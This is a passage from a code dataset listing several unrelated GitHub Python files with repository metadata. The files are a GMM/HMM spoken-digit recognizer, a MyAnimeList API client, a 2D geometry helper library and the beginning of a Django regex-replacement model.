model[digit].train(data)\n\n return model\n\n\ndef gmm_train(digits, train_data, sg_model, ncomp, niter):\n logging.info(\"Gaussian mixture training, %d components, %d iterations\", ncomp, niter)\n\n gmm_model = {}\n for digit in digits:\n gmm_model[digit] = GMM(sg_model[digit], ncomp=ncomp)\n\n i = 0\n while i < niter:\n logging.info(\"iteration: %d\", i)\n total_log_like = 0.0\n for digit in digits:\n data = np.vstack([train_data[id] for id in train_data.keys() if digit in id.split('_')[1]])\n logging.info(\"process %d data for digit %s\", len(data), digit)\n\n gmm_model[digit].train(data)\n\n total_log_like += gmm_model[digit].loglike(data)\n logging.info(\"log likelihood: %f\", total_log_like)\n i += 1\n\n return gmm_model\n\n\ndef hmm_train(digits, train_data, sg_model, nstate, niter):\n logging.info(\"hidden Markov model training, %d states, %d iterations\", nstate, niter)\n\n hmm_model = {}\n data_dict = {}\n for digit in digits:\n hmm_model[digit] = HMM(sg_model[digit], nstate=nstate)\n data = [train_data[id] for id in train_data.keys() if digit in id.split('_')[1]]\n data_dict[digit] = data\n\n i = 0\n while i < niter:\n logging.info(\"iteration: %d\", i)\n total_log_like = 0.0\n total_count = 0.0\n for digit in digits:\n data = data_dict[digit]\n logging.info(\"process %d data for digit %s\", 
len(data), digit)\n\n hmm_model[digit].train(data, i)\n\n for data_u in data:\n total_log_like += hmm_model[digit].loglike(data_u)\n\n logging.info(\"log likelihood: %f\", total_log_like)\n i += 1\n\n return hmm_model\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('train', type=str, help='training data')\n parser.add_argument('test', type=str, help='test data')\n parser.add_argument('--niter', type=int, default=10)\n parser.add_argument('--nstate', type=int, default=5)\n parser.add_argument('--ncomp', type=int, default=8)\n parser.add_argument('--mode', type=str, default='sg',\n choices=['sg', 'gmm', 'hmm'],\n help='Type of models')\n parser.add_argument('--debug', action='store_true')\n args = parser.parse_args()\n\n # set seed\n np.random.seed(777)\n\n # logging info\n log_format = \"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s:%(message)s\"\n logging.basicConfig(level=logging.INFO, format=log_format)\n\n digits = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"z\", \"o\"]\n\n # read training data\n with open(args.train) as f:\n train_data = get_data_dict(f.readlines())\n # for debug - use only 100 files\n if args.debug:\n #train_data = {key: train_data[key] for key in list(train_data.keys())[:100]}\n train_data = {key: train_data[key] for key in list(train_data.keys())}\n\n # read test data\n with open(args.test) as f:\n test_data = get_data_dict(f.readlines())\n # for debug\n if args.debug:\n #test_data = {key: test_data[key] for key in list(test_data.keys())[:100]}\n test_data = {key: test_data[key] for key in list(test_data.keys())}\n\n # Single Gaussian\n sg_model = sg_train(digits, train_data)\n\n if args.mode == 'sg':\n model = sg_model\n elif args.mode == 'hmm':\n model = hmm_train(digits, train_data, sg_model, args.nstate, args.niter)\n elif args.mode == 'gmm':\n model = gmm_train(digits, train_data, sg_model, args.ncomp, args.niter)\n\n # test data performance\n total_count = 0\n correct = 0\n for key in test_data.keys():\n lls = []\n for digit in digits:\n ll = model[digit].loglike(test_data[key])\n lls.append(ll)\n predict = digits[np.argmax(np.array(lls))]\n log_like = np.max(np.array(lls))\n\n logging.info(\"predict %s for utt %s (log like = %f)\", predict, key, log_like)\n if predict in key.split('_')[1]:\n correct += 1\n total_count += 1\n\n logging.info(\"accuracy: %f\", float(correct / total_count * 100))","repo_name":"yuweiwan/ASR-SG-HMM-GMM","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12765,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"40777874847","text":"#findDigits.py\n\n\ndef findDigits(n):\n numbers = list(map(int, str(n)))\n divisors = 0\n for num in range (len(numbers)):\n if numbers[num] != 0:\n if n % numbers[num] ==0:\n divisors += 1\n return divisors\n\nn = 123\nprint (findDigits(n))\n","repo_name":"OzRhodes/Hackerrank","sub_path":"findDigits.py","file_name":"findDigits.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74002242329","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 11 21:45:04 2018\n\n@author: lixiaodan\nget data set : https://dumps.wikimedia.org/enwiki/latest/\nreference : https://github.com/sharnett/wiki_pagerank\nhttp://snap.stanford.edu/data/wiki-meta.html\n\"\"\"\n\n\n\"THis file is to process network features\"\nfilename = 
\"/Users/lixiaodan/Desktop/wikipedia_project/dataset/wiki_pageLinks/tlwiki-latest-pagelinks.sql\"\nfd = open(filename, 'r', encoding=\"ISO-8859-1\")\nsqlFile = fd.read()\nsqlCommands = sqlFile.split(';')\nfor pageLink in fd:\n print(pageLink)\nfd.close()","repo_name":"Daniellee1990/Wikipeida_quality_analysis","sub_path":"network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"26673567144","text":"\"\"\"Module in charge of making requests to the API and managing possible errors.\"\"\"\nimport requests\nimport logging\nfrom typing import Any, List, Dict, Optional, Sequence, Union\n\nfrom .endpoints import Endpoint\nfrom .anime import Anime, AnimeSearchResults, AnimeList, AnimeRanking, Seasonal\nfrom .manga import Manga, MangaSearchResults, MangaList, MangaRanking\nfrom .forum import BoardCategory, ForumTopics, Discussion\nfrom .enums import (Field, AnimeListStatus, MangaListStatus, Season,\n AnimeRankingType, MangaRankingType, AnimeListSort, MangaListSort,\n SeasonalAnimeSort)\nfrom .utils import MISSING\n\n_log = logging.getLogger(__name__)\n\n\nclass Client:\n \"\"\"Offers the interface to make requests.\"\"\"\n\n def __init__(self, client_id: str):\n self.__client_id: str = client_id\n self._session: requests.Session = requests.Session()\n self._session.headers.update({'X-MAL-CLIENT-ID': self.__client_id})\n self._limit: int = 10\n self._anime_fields: List[Field] = Field.default_anime()\n self._manga_fields: List[Field] = Field.default_manga()\n self._include_nsfw: bool = False\n\n @property\n def limit(self) -> int:\n \"\"\"Maximum number of results per page. Defaults to 10. Can be changed\n to any positive integer, it will be automatically adjusted to fit within\n the API limits.\n\n Raises:\n ValueError: if a negative value is passed\n \"\"\"\n return self._limit\n\n @limit.setter\n def limit(self, value: int) -> None:\n if value < 0:\n raise ValueError('limit must be a positive integer')\n self._limit = int(value)\n _log.info(\n f'parameter \"search_limit\" default value set to {self._limit}')\n\n @property\n def anime_fields(self) -> List[Field]:\n \"\"\"Fields that are requested in a anime query. This value is used in the following\n methods:\n - anime_search\n - get_anime\n - get_anime_list\n - get_seasonal_anime\n - get_anime_ranking\n\n Changes to this value are applied to all subsequent requests. Invalid fields\n are automatically ignored.\n It is possible to override this value per request by specifying the `fields` parameter.\n \"\"\"\n return self._anime_fields\n\n @anime_fields.setter\n def anime_fields(self, new_fields: Sequence[Union[Field, str]]) -> None:\n fields = Field.from_list(new_fields)\n self._anime_fields = [f for f in fields if f.is_anime]\n _log.info(\n f'parameter \"anime_fields\" default value set to {self._anime_fields}')\n\n @property\n def manga_fields(self) -> List[Field]:\n \"\"\"Fields that are requested in a manga query. This value is used in the following\n methods:\n - manga_search\n - get_manga\n - get_manga_list\n - get_manga_ranking\n\n Changes to this value are applied to all subsequent requests. 
Invalid fields\n        are automatically ignored.\n        It is possible to override this value per request by specifying the `fields` parameter.\n        \"\"\"\n        return self._anime_fields\n\n    @anime_fields.setter\n    def anime_fields(self, new_fields: Sequence[Union[Field, str]]) -> None:\n        fields = Field.from_list(new_fields)\n        self._anime_fields = [f for f in fields if f.is_anime]\n        _log.info(\n            f'parameter \"anime_fields\" default value set to {self._anime_fields}')\n\n    @property\n    def manga_fields(self) -> List[Field]:\n        \"\"\"Fields that are requested in a manga query. This value is used in the following\n        methods:\n        - manga_search\n        - get_manga\n        - get_manga_list\n        - get_manga_ranking\n\n        Changes to this value are applied to all subsequent requests. Invalid fields\n        are automatically ignored.\n        It is possible to override this value per request by specifying the `fields` parameter.\n        \"\"\"\n        return self._manga_fields\n\n    @manga_fields.setter\n    def manga_fields(self, new_fields: Sequence[Union[Field, str]]) -> None:\n        fields = Field.from_list(new_fields)\n        self._manga_fields = [f for f in fields if f.is_manga]\n        _log.info(\n            f'parameter \"manga_fields\" default value set to {self._manga_fields}')\n\n    @property\n    def include_nsfw(self) -> bool:\n        \"\"\"Specifies whether to include results marked as nsfw. Defaults to False.\n\n        Changes to this value are applied to all subsequent requests.\n        It is possible to override this value per request by specifying the `nsfw` parameter.\n        \"\"\"\n        return self._include_nsfw\n\n    @include_nsfw.setter\n    def include_nsfw(self, value: bool) -> None:\n        self._include_nsfw = value\n        _log.info(f'parameter \"nsfw\" default value set to {value}')\n\n    def anime_search(\n        self,\n        query: str,\n        *,\n        limit: int = MISSING,\n        offset: int = MISSING,\n        fields: Sequence[Union[Field, str]] = MISSING,\n        include_nsfw: bool = MISSING\n    ) -> AnimeSearchResults:\n        \"\"\"Search anime matching the given query. By default it uses the default parameters\n        or the ones that have been set in limit and fields. If you pass limit and fields to this\n        method they are used for this query only.\n\n        Args:\n            query: string used to search titles, between 3 and 64 characters\n\n        Keyword args:\n            limit: maximum number of results, needs to be between 1 and 100\n            offset: get results at a certain offset from the start, defaults to 0\n            fields: the fields that are going to be requested, for a complete list see Field enum\n            include_nsfw: include results marked as nsfw\n\n        Returns:\n            AnimeSearchResults: iterable object containing the results\n\n        Raises:\n            ValueError: when the query is not between 3 and 64 characters\n        \"\"\"\n        if len(query) > 64 or len(query) < 3:\n            raise ValueError(\n                'query parameter needs to be between 3 and 64 characters long')\n        parameters = self._build_parameters(\n            Endpoint.ANIME, query=query, limit=limit, offset=offset, fields=fields, nsfw=include_nsfw)\n        url: str = Endpoint.ANIME.url\n        response = self._request(url, params=parameters)\n        data = response.json()\n        results = AnimeSearchResults(data)\n        return results\n\n    
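# A hypothetical quick-start, using only the public methods defined above:\n    #   client = Client('your-client-id')\n    #   results = client.anime_search('one piece', limit=5)\n\n    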
def manga_search(\n        self,\n        query: str,\n        *,\n        limit: int = MISSING,\n        offset: int = MISSING,\n        fields: Sequence[Union[Field, str]] = MISSING,\n        include_nsfw: bool = MISSING\n    ) -> MangaSearchResults:\n        \"\"\"Search manga matching the given query. By default it uses the default parameters\n        or the ones that have been set in limit and fields. If you pass limit and fields to this\n        method they are used for this query only.\n\n        Args:\n            query: string used to search titles, between 3 and 64 characters\n\n        Keyword args:\n            limit: maximum number of results, needs to be between 1 and 100\n            offset: get results at a certain offset from the start, defaults to 0\n            fields: the fields that are going to be requested, for a complete list see Field enum\n            include_nsfw: include results marked as nsfw\n\n        Returns:\n            MangaSearchResults: iterable object containing the results\n\n        Raises:\n            ValueError: when the query is not between 3 and 64 characters\n        \"\"\"\n        if len(query) > 64 or len(query) < 3:\n            raise ValueError(\n                'query parameter needs to be between 3 and 64 characters long')\n        parameters = self._build_parameters(\n            Endpoint.MANGA, query=query, limit=limit, offset=offset, fields=fields, nsfw=include_nsfw)\n        url: str = Endpoint.MANGA.url\n        response = self._request(url, params=parameters)\n        data = response.json()\n        results = MangaSearchResults(data)\n        return results\n\n    def get_anime(self, id: Union[int, str], *, fields: Sequence[Union[Field, str]] = MISSING) -> Anime:\n        \"\"\"Get the details for a specific anime given the id.\n\n        Args:\n            id: the id of the anime or the url of its MAL page\n\n        Keyword args:\n            fields: list of fields to retrieve for this request\n\n        Returns:\n            Anime: the anime object with all the details\n        \"\"\"\n        parameters = self._build_parameters(\n            Endpoint.ANIME, fields=fields)\n        url: str = Endpoint.ANIME.url + '/' + self._get_as_id(id)\n        response = self._request(url, params=parameters)\n        data = response.json()\n        return Anime(data)\n\n    def get_manga(self, id: Union[int, str], *, fields: Sequence[Union[Field, str]] = MISSING) -> Manga:\n        \"\"\"Get the details for a specific manga given the id.\n\n        Args:\n            id: the id of the manga or the url of its MAL page\n\n        Keyword args:\n            fields: list of fields to retrieve for this request\n\n        Returns:\n            Manga: the manga object with all the details\n        \"\"\"\n        parameters = self._build_parameters(\n            Endpoint.MANGA, fields=fields)\n        url: str = Endpoint.MANGA.url + '/' + self._get_as_id(id)\n        response = self._request(url, params=parameters)\n        data = response.json()\n        return Manga(data)\n\n    def get_anime_list(\n        self,\n        username: str,\n        *,\n        limit: int = MISSING,\n        offset: int = MISSING,\n        fields: Sequence[Union[Field, str]] = MISSING,\n        status: Union[AnimeListStatus, str] = MISSING,\n        sort: Union[AnimeListSort, str] = MISSING,\n        include_nsfw: bool = MISSING\n    ) -> AnimeList:\n        \"\"\"Returns the anime list of a specific user, if public.\n\n        Args:\n            username: the MAL username of the user, case insensitive\n\n        Keyword args:\n            limit: set the number of entries to retrieve, defaults to 10\n            offset: get results at a certain offset from the start, defaults to 0\n            fields: set which fields to get for each entry\n            status: return only a specific category. 
will return all if omitted\n sort: specify the sorting of the list\n include_nsfw: include results marked as nsfw\n\n Returns:\n AnimeList: iterable with all the entries of the list\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.USER_ANIMELIST, limit=limit, offset=offset, fields=fields, status=status, nsfw=include_nsfw, sort=sort)\n url = Endpoint.USER_ANIMELIST.url.replace('{username}', username)\n response = self._request(url, params=parameters)\n data = response.json()\n return AnimeList(data)\n\n def get_manga_list(\n self,\n username: str,\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n status: Union[MangaListStatus, str] = MISSING,\n sort: Union[MangaListSort, str] = MISSING,\n include_nsfw: bool = MISSING\n ) -> MangaList:\n \"\"\"Returns the manga list of a specific user, if public.\n\n Args:\n username: the MAL username of the user, case insensitive\n\n Keyword args:\n limit: set the number of entries to retrieve, defaults to 10\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n status: return only a specific category. will return all if omitted\n sort: specify the sorting of the list\n include_nsfw: include results marked as nsfw\n\n Returns:\n MangaList: iterable with all the entries of the list\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.USER_MANGALIST, limit=limit, offset=offset, fields=fields, status=status, nsfw=include_nsfw, sort=sort)\n url = Endpoint.USER_MANGALIST.url.replace('{username}', username)\n response = self._request(url, params=parameters)\n data = response.json()\n return MangaList(data)\n\n def get_seasonal_anime(\n self,\n year: int,\n season: Union[str, Season],\n *,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n sort: Union[SeasonalAnimeSort, str] = MISSING,\n include_nsfw: bool = MISSING\n ) -> Seasonal:\n \"\"\"Returns the list of anime aired during a specific season.\n\n Args:\n year: the desired year\n season: the desired season, can be winter, spring, summer or fall.\n | In particular they correspond to specific months\n | winter -> January, February, March\n | spring -> April, May, June\n | summer -> July, August, September\n | fall -> October, November, December\n\n Keyword args:\n limit: set the number of entries to retrieve, defaults to 10\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n sort: how to sort the results\n include_nsfw: include results marked as nsfw\n\n Returns:\n Seasonal: container for the results, sorted by score\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME_SEASONAL, limit=limit, offset=offset, fields=fields, sort=sort, nsfw=include_nsfw)\n url = f'{Endpoint.ANIME_SEASONAL}/{year}/{season}'\n response = self._request(url, params=parameters)\n data = response.json()\n results: Seasonal = Seasonal(data)\n return results\n\n def get_anime_ranking(\n self,\n *,\n ranking_type: Union[str, AnimeRankingType] = AnimeRankingType.all,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING\n ) -> AnimeRanking:\n \"\"\"Returns the top anime in the rankings.\n\n Keyword args:\n ranking_type: the type of ranking to request, defaults to all.\n For all possible values see enums.AnimeRanking\n limit: numbers of entries to request\n offset: get results at a certain offset from the start, defaults to 0\n 
fields: set which fields to get for each entry\n\n Returns:\n AnimeRanking: the results\n\n Raises:\n ValueError: ranking_type is invalid, check AnimeRankingType for all options\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.ANIME_RANKING, limit=limit, offset=offset, fields=fields)\n if isinstance(ranking_type, str):\n ranking_type = AnimeRankingType(ranking_type)\n parameters['ranking_type'] = f'{ranking_type}'\n url: str = Endpoint.ANIME_RANKING.url\n response = self._request(url, params=parameters)\n data = response.json()\n ranking = AnimeRanking(data)\n ranking.type = ranking_type\n return ranking\n\n def get_manga_ranking(\n self,\n *,\n ranking_type: Union[str, MangaRankingType] = MangaRankingType.all,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING\n ) -> MangaRanking:\n \"\"\"Returns the top manga in the rankings.\n\n Keyword args:\n ranking_type: the type of ranking to request, defaults to all.\n For all possible values see enums.MangaRanking\n limit: numbers of entries to request\n offset: get results at a certain offset from the start, defaults to 0\n fields: set which fields to get for each entry\n\n Returns:\n MangaRanking: the results\n\n Raises:\n ValueError: ranking_type is invalid, check MangaRankingType for all options\n \"\"\"\n parameters = self._build_parameters(\n Endpoint.MANGA_RANKING, limit=limit, offset=offset, fields=fields)\n if isinstance(ranking_type, str):\n ranking_type = MangaRankingType(ranking_type)\n parameters['ranking_type'] = f'{ranking_type}'\n url: str = Endpoint.MANGA_RANKING.url\n response = self._request(url, params=parameters)\n data = response.json()\n ranking = MangaRanking(data)\n ranking.type = ranking_type\n return ranking\n\n def get_boards(self) -> Sequence[BoardCategory]:\n \"\"\"Returns a list of the forum boards divided by category.\"\"\"\n url: str = Endpoint.FORUM_BOARDS.url\n response = self._request(url)\n data = response.json()\n categories: List[BoardCategory] = []\n for category in data['categories']:\n categories.append(BoardCategory(category))\n return categories\n\n def get_topics(\n self,\n *,\n query: str = MISSING,\n board_id: int = MISSING,\n subboard_id: int = MISSING,\n limit: int = MISSING,\n offset: int = MISSING,\n topic_user_name: str = MISSING,\n user_name: str = MISSING\n ) -> ForumTopics:\n \"\"\"Returns all the topics matching the given parameters. 
At least one of the arguments\n        must be specified.\n\n        Keyword Args:\n            query: query used to search topics, minimum length 3 characters\n            board_id: limit the search to a specific board\n            subboard_id: limit the search to a specific subboard\n            limit: maximum number of results, between 1 and 100\n            offset: get results at a certain offset from the start, defaults to 0\n            topic_user_name: return only topics started by a specific user\n            user_name: return topics where the user has participated\n            NOTE: the difference between topic_user_name and user_name is not clear;\n            to get all posts by a user, use only topic_user_name\n\n        Raises:\n            ValueError: no argument was specified\n        \"\"\"\n        parameters = self._build_parameters(Endpoint.FORUM_TOPICS, query=query, board_id=board_id,\n                                            subboard_id=subboard_id, limit=limit, offset=offset,\n                                            topic_user_name=topic_user_name, user_name=user_name)\n        url: str = Endpoint.FORUM_TOPICS.url\n        response = self._request(url, params=parameters)\n        data = response.json()\n        return ForumTopics(data, query)\n\n    def get_topic_details(\n        self,\n        topic_id: int,\n        *,\n        limit: int = MISSING,\n        offset: int = MISSING\n    ) -> Discussion:\n        \"\"\"Returns all the details on a given topic.\n\n        Args:\n            topic_id: required, the id of the topic to request\n\n        Keyword Args:\n            limit: the number of posts to retrieve, defaults to 100\n            offset: get results at a certain offset from the start, defaults to 0\n        \"\"\"\n        parameters: Dict[str, str] = {}\n        if limit is not MISSING:\n            parameters['limit'] = str(self._get_limit(\n                Endpoint.FORUM_TOPIC_DETAIL, limit))\n        if offset is not MISSING:\n            parameters['offset'] = str(offset)\n        url: str = f'{Endpoint.FORUM_TOPIC_DETAIL}/{topic_id}'\n        response = self._request(url, params=parameters)\n        data = response.json()\n        return Discussion(data['data'])\n\n    def get_url(self, url: Optional[str]) -> Any:\n        \"\"\"Get the raw json data from the given url. 
Mostly for internal use.\"\"\"\n if url is None:\n return None\n response = self._session.get(url)\n _log.info(f'Fetching url: {url}')\n if response.status_code != requests.codes.ok:\n _log.error(\n f'Request to {url} errored with code {response.status_code}')\n response.raise_for_status()\n return response.json()\n\n def _request(self, url: str, params: Dict[str, str] = MISSING) -> requests.Response:\n \"\"\"Handles all the requests that are made and checks the status code of the response.\n If a requests raises an exception it is propagated.\n \"\"\"\n if params is not MISSING:\n response = self._session.get(url, params=params)\n else:\n response = self._session.get(url)\n if response.status_code != requests.codes.ok:\n _log.error(\n f'Request to {url} with parameters {params} errored with code {response.status_code}')\n response.raise_for_status() # TODO: handle error and possible retries\n return response\n\n def _build_parameters(\n self,\n endpoint: Endpoint,\n *,\n query: str = MISSING,\n limit: int = MISSING,\n offset: int = MISSING,\n fields: Sequence[Union[Field, str]] = MISSING,\n nsfw: bool = MISSING,\n status: Union[AnimeListStatus, MangaListStatus, str] = MISSING,\n sort: Union[AnimeListSort, MangaListSort,\n SeasonalAnimeSort, str] = MISSING,\n board_id: int = MISSING,\n subboard_id: int = MISSING,\n topic_user_name: str = MISSING,\n user_name: str = MISSING\n ) -> Dict[str, str]:\n parameters: Dict[str, str] = {}\n if not endpoint.is_forum:\n if query is not MISSING:\n parameters['q'] = query\n if limit is not MISSING:\n parameters['limit'] = str(self._get_limit(endpoint, limit))\n else:\n parameters['limit'] = str(self._limit)\n if offset is not MISSING:\n parameters['offset'] = str(offset)\n if fields is not MISSING:\n parsed_fields = Field.from_list(fields)\n if endpoint.is_anime:\n parameters['fields'] = ','.join(\n [f.value for f in parsed_fields if f.is_anime])\n else:\n parameters['fields'] = ','.join(\n [f.value for f in parsed_fields if f.is_manga])\n if endpoint.is_list:\n parameters['fields'] += ',list_status'\n else:\n if endpoint.is_anime:\n parameters['fields'] = ','.join(\n [f.value for f in self._anime_fields])\n else:\n parameters['fields'] = ','.join(\n [f.value for f in self._manga_fields])\n if endpoint.is_list:\n parameters['fields'] += ',list_status'\n if status is not MISSING:\n if isinstance(status, str):\n value = status\n else:\n value = status.value\n parameters['status'] = value\n if sort is not MISSING:\n if isinstance(sort, str):\n value = sort # NOTE: how can i validate the string?\n else:\n value = sort.value\n parameters['sort'] = value\n # nsfw overrides the value stored in self.include_nsfw\n if nsfw is MISSING:\n if self.include_nsfw:\n parameters['nsfw'] = 'true'\n elif nsfw:\n parameters['nsfw'] = 'true'\n else: # forum endpoint\n if query is not MISSING:\n parameters['q'] = query\n if board_id is not MISSING:\n parameters['board_id'] = str(board_id)\n if subboard_id is not MISSING:\n parameters['subboard_id'] = str(subboard_id)\n if limit is not MISSING:\n parameters['limit'] = str(self._get_limit(endpoint, limit))\n if offset is not MISSING:\n parameters['offset'] = str(offset)\n if topic_user_name is not MISSING:\n parameters['topic_user_name'] = topic_user_name\n if user_name is not MISSING:\n parameters['user_name'] = user_name\n if not parameters:\n raise ValueError(\n 'At least one parameter must be specified to search topics.')\n return parameters\n\n def _get_limit(self, endpoint: Endpoint, value: int) -> int:\n \"\"\"Check 
that the value of the parameter limit is within\n        the correct interval for the given endpoint. If the value is outside,\n        the closest value inside the interval is returned.\n        \"\"\"\n        limit = 1\n        if value < 1:\n            limit = 1\n        elif value > endpoint.limit:\n            limit = endpoint.limit\n        else:\n            limit = value\n        return limit\n\n    def _get_as_id(self, value: Union[int, str]) -> str:\n        \"\"\"Returns the string representing the id that can be used\n        to build the url to request. Accepts either an int or the url of the\n        MAL page.\n        \"\"\"\n        if isinstance(value, int):\n            return str(value)\n        # extract the id from the url\n        # need to extract the value between the last two slashes\n        # example https://myanimelist.net/anime/16498/Shingeki_no_Kyojin -> 16498\n        _ = value.split('/')\n        return _[-2]\n","repo_name":"Skylake-dev/mal.py","sub_path":"mal/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":24380,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"}
+{"seq_id":"36389446336","text":"#!/usr/bin/python3\n\n\"\"\"This is a library that provides geometry classes and functions\n\n   It is a part of mammoth-world project\n   (https://github.com/vasalf/mammoth-world)\n\n\"\"\"\n\nfrom random import *\nfrom math import log\n\n\"\"\"A place to import modules is up to that comment.\n\n\"\"\"\n\n__author__ = \"vasalf\"\n\n\ndef cross_product(a, b):\n    return a[0] * b[1] - b[0] * a[1]\n\n\ndef dot_product(a, b):\n    return a[0] * b[0] + a[1] * b[1]\n\n\ndef sq_point_distance(a, b):\n    x = a[0] - b[0]\n    y = a[1] - b[1]\n    return x * x + y * y\n\n\ndef vector(a, b):\n    return (b[0] - a[0], b[1] - a[1])\n\n\nclass __sorted_by_polar_angle_point:\n    \"\"\"This is a helper class for convex\n\n    \"\"\"\n    def __init__(self, p, first):\n        self.__pt = p[:]\n        self.__first = first[:]\n\n    def __getitem__(self, i):\n        return self.__pt[i]\n\n    def __lt__(self, other):\n        if cross_product(vector(self.__first, self),\n                         vector(self.__first, other)) == 0:\n            return sq_point_distance(self.__first, self) < \\\n                   sq_point_distance(self.__first, other)\n        else:\n            return cross_product(vector(self.__first, self),\n                                 vector(self.__first, other)) > 0\n\n    def __tuple__(self):\n        return self.__pt\n\n\ndef convex(point_set):\n    \"\"\"This function builds the convex hull of a point_set.\n    It uses Graham's algorithm.\n\n    \"\"\"\n    start = min(point_set)\n    set_copy = []\n    for p in point_set:\n        set_copy.append(__sorted_by_polar_angle_point(p, start))\n    set_copy.sort()\n    set_copy.append(start)\n    res = set_copy[:2]\n    for p in set_copy[2:]:\n        while len(res) >= 2 and \\\n              cross_product(vector(res[-1], res[-2]), vector(res[-1], p)) >= 0:\n            res.pop()\n        res.append(p)\n    return list(map(tuple, res[:-1]))\n\n\ndef unite(lst):\n    res = []\n    for pol in lst:\n        for p in pol:\n            res.append(p)\n    return res\n\n\n\"\"\"Here are some geometry helper functions\n\n\"\"\"\n\n\ndef is_point_in_segment(p, a, b):\n    return cross_product(vector(p, a), vector(p, b)) == 0 and \\\n           dot_product(vector(p, a), vector(p, b)) <= 0\n\n\ndef do_segments_intersect(a, b, c, d):\n    if cross_product(vector(a, b), vector(c, d)) == 0:\n        return is_point_in_segment(a, c, d) or \\\n               is_point_in_segment(b, c, d) or \\\n               is_point_in_segment(c, a, b) or \\\n               is_point_in_segment(d, a, b)\n    else:\n        return cross_product(vector(a, c), vector(a, b)) * \\\n               cross_product(vector(a, b), vector(a, d)) >= 0 and \\\n               cross_product(vector(c, a), vector(c, d)) * \\\n               cross_product(vector(c, d), vector(c, b)) >= 0\n\n\n
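# Quick sanity examples (hypothetical, not from the original file):\n#   do_segments_intersect((0, 0), (2, 2), (0, 2), (2, 0)) -> True   (proper crossing)\n#   do_segments_intersect((0, 0), (1, 0), (2, 0), (3, 0)) -> False  (collinear, disjoint)\ndef do_segments_strongly_intersect(a, b, c, d):\n    if not 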
do_segments_intersect(a, b, c, d):\n        return False\n    if cross_product(vector(a, b), vector(c, d)) == 0:\n        if a == c:\n            return not is_point_in_segment(d, a, b) and \\\n                   not is_point_in_segment(b, c, d)\n        if a == d:\n            return not is_point_in_segment(c, a, b) and \\\n                   not is_point_in_segment(b, c, d)\n        if b == c:\n            return not is_point_in_segment(d, a, b) and \\\n                   not is_point_in_segment(a, c, d)\n        if b == d:\n            return not is_point_in_segment(c, a, b) and \\\n                   not is_point_in_segment(a, c, d)\n        return not is_point_in_segment(a, c, d) and \\\n               not is_point_in_segment(b, c, d) and \\\n               not is_point_in_segment(c, a, b) and \\\n               not is_point_in_segment(d, a, b)\n\n\ndef signum(a):\n    if a < 0:\n        return -1\n    elif a == 0:\n        return 0\n    else:\n        return 1\n\n\ndef do_segment_and_hor_ray_intersect(p, a, b):\n    q = p[0] + 1, p[1]\n    if b[1] == p[1]:\n        return False\n    return signum(cross_product(vector(p, q), vector(p, a))) != \\\n           signum(cross_product(vector(p, q), vector(p, b))) and \\\n           cross_product(vector(p, a), vector(p, b)) > 0\n\n\n# ray casting: a point is inside iff a rightward ray crosses the boundary an odd number of times\ndef is_point_in_polygon(p, lst):\n    num = 0\n    for i in range(len(lst)):\n        if is_point_in_segment(p, lst[i - 1], lst[i]):\n            return True\n        if lst[i][1] == lst[i - 1][1]:\n            continue\n        if lst[i - 1][1] > lst[i][1] and \\\n           do_segment_and_hor_ray_intersect(p, lst[i], lst[i - 1]):\n            num += 1\n        elif lst[i - 1][1] < lst[i][1] and \\\n             do_segment_and_hor_ray_intersect(p, lst[i - 1], lst[i]):\n            num += 1\n    return (num & 1) == 1\n\n\ndef middle(a, b):\n    return (a[0] + b[0]) / 2, (a[1] + b[1]) / 2\n","repo_name":"vasalf/mammoth-world","sub_path":"W2/helpers/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"74631666007","text":"from django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.functional import cached_property\nfrom django.utils.safestring import mark_safe\n# Create your models here.\n\nimport re\n\nfrom base import models as base_models\nfrom languages import models as lang_models\nfrom base import descriptions,functions\n\n# cartesian-product style combination, e.g. combine([[1, 2], [3]]) -> [[1, 3], [2, 3]]\ndef combine(list_of_list):\n    if len(list_of_list)==0: return []\n    if len(list_of_list)==1: \n        return [ [x] for x in list_of_list[0] ]\n    A=list_of_list[0]\n    B=combine(list_of_list[1:])\n    ret=[]\n    for x in A:\n        for y in B:\n            ret.append( [x]+y )\n    return ret\n\nclass RegexpReplacementManager(models.Manager):\n    def update_reverse(self):\n        for obj in self.all():\n            #if hasattr(obj,\"reverse\"): continue\n            RegexpReverse.objects.add_reverse(obj)\n    \n    def de_serialize(self,data):\n        regsub,created=self.get_or_create(pattern=data[\"pattern\"],\n                                          replacement=data[\"replacement\"])\n        if \"reverse\" in data:\n            rev,created=RegexpReverse.objects.update_or_create(target=regsub,defaults=data[\"reverse\"])\n        return regsub\n\n    def get_default(self):\n        regexp,created=RegexpReplacement.objects.get_or_create(pattern=\"(.+)\",replacement=\"\\\\1\")\n        return regexp\n\nclass 